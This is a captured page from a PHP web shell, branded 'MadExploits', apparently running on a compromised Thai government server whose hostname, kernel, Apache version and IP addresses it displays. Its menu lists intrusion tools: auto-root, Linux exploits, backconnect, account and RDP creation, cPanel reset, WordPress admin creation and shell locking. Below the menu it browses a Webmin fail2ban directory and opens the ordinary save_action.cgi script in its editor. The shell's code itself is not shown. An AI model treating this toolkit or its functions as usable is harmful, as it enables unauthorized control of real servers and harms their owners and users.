Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
fail2ban /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
110
B
-rw-r--r--
atboot.cgi
866
B
-rwxr-xr-x
backup_config.pl
718
B
-rwxr-xr-x
config
100
B
-rw-r--r--
config-debian-linux
118
B
-rw-r--r--
config-redhat-linux
118
B
-rw-r--r--
config-syno-linux
100
B
-rw-r--r--
config.info
196
B
-rw-r--r--
config.info.ca
245
B
-rw-r--r--
config.info.ca.UTF-8
249
B
-rw-r--r--
config.info.de
206
B
-rw-r--r--
config.info.de.UTF-8
206
B
-rw-r--r--
config.info.ms_MY
201
B
-rw-r--r--
config.info.ms_MY.UTF-8
201
B
-rw-r--r--
config.info.no
203
B
-rw-r--r--
config.info.no.UTF-8
203
B
-rw-r--r--
config.info.pl
226
B
-rw-r--r--
config.info.pl.UTF-8
232
B
-rw-r--r--
delete_actions.cgi
824
B
-rwxr-xr-x
delete_filters.cgi
824
B
-rwxr-xr-x
delete_jails.cgi
571
B
-rwxr-xr-x
edit_action.cgi
2.07
KB
-rwxr-xr-x
edit_config.cgi
1.62
KB
-rwxr-xr-x
edit_filter.cgi
1.62
KB
-rwxr-xr-x
edit_jail.cgi
3.85
KB
-rwxr-xr-x
edit_jaildef.cgi
2.55
KB
-rwxr-xr-x
edit_manual.cgi
1
KB
-rwxr-xr-x
fail2ban-lib.pl
13.35
KB
-rw-r--r--
index.cgi
2.04
KB
-rwxr-xr-x
install_check.pl
412
B
-rwxr-xr-x
list_actions.cgi
1.1
KB
-rwxr-xr-x
list_filters.cgi
1.15
KB
-rwxr-xr-x
list_jails.cgi
1.5
KB
-rwxr-xr-x
log_parser.pl
751
B
-rwxr-xr-x
module.info
201
B
-rw-r--r--
module.info.ca
148
B
-rw-r--r--
module.info.ca.UTF-8
161
B
-rw-r--r--
module.info.de
142
B
-rw-r--r--
module.info.de.UTF-8
154
B
-rw-r--r--
module.info.ms_MY
167
B
-rw-r--r--
module.info.ms_MY.UTF-8
179
B
-rw-r--r--
module.info.no
36
B
-rw-r--r--
module.info.no.UTF-8
42
B
-rw-r--r--
module.info.pl
153
B
-rw-r--r--
module.info.pl.UTF-8
170
B
-rw-r--r--
restart.cgi
281
B
-rwxr-xr-x
save_action.cgi
1.81
KB
-rwxr-xr-x
save_config.cgi
922
B
-rwxr-xr-x
save_filter.cgi
1.64
KB
-rwxr-xr-x
save_jail.cgi
3.66
KB
-rwxr-xr-x
save_jaildef.cgi
1.44
KB
-rwxr-xr-x
save_manual.cgi
567
B
-rwxr-xr-x
start.cgi
273
B
-rwxr-xr-x
stop.cgi
269
B
-rwxr-xr-x
syslog_logs.pl
527
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : save_action.cgi
#!/usr/bin/perl # Create, update or delete a action use strict; use warnings; require './fail2ban-lib.pl'; our (%in, %text, %config); &ReadParse(); &error_setup($text{'action_err'}); my ($action, $def); if ($in{'new'}) { # Create new action object $def = { 'name' => 'Definition', 'members' => [ ] }; $action = [ $def ]; } else { # Find existing action ($action) = grep { $_->[0]->{'file'} eq $in{'file'} } &list_actions(); $action || &error($text{'action_egone'}); ($def) = grep { $_->{'name'} eq 'Definition' } @$action; $def || &error($text{'action_edefgone'}); } my $file = $in{'file'}; if ($in{'delete'}) { # Just delete the action my @users = &find_jail_by_action($action); @users && &error(&text('action_einuse', join(" ", map { $_->{'name'} } @users))); &lock_all_config_files(); &delete_section($file, $def); &unlock_all_config_files(); } else { # Validate inputs my $file; if ($in{'new'}) { $in{'name'} =~ /^[a-z0-9\_\-]+$/i || &error($text{'action_ename'}); $file = "$config{'config_dir'}/action.d/$in{'name'}.conf"; -r $file && &error($text{'action_eclash'}); } # Create new section if needed &lock_all_config_files(); if ($in{'new'}) { &create_section($file, $def); } # Save directives within the section $in{'start'} =~ s/\r//g; &save_directive("actionstart", $in{'start'}, $def); $in{'stop'} =~ s/\r//g; &save_directive("actionstop", $in{'stop'}, $def); $in{'check'} =~ s/\r//g; &save_directive("actioncheck", $in{'check'}, $def); $in{'ban'} =~ s/\r//g; &save_directive("actionban", $in{'ban'}, $def); $in{'unban'} =~ s/\r//g; &save_directive("actionunban", $in{'unban'}, $def); &unlock_all_config_files(); } # Log and redirect &webmin_log($in{'delete'} ? 'delete' : $in{'new'} ? 'create' : 'update', 'action', &filename_to_name($file)); &redirect("list_actions.cgi");
Close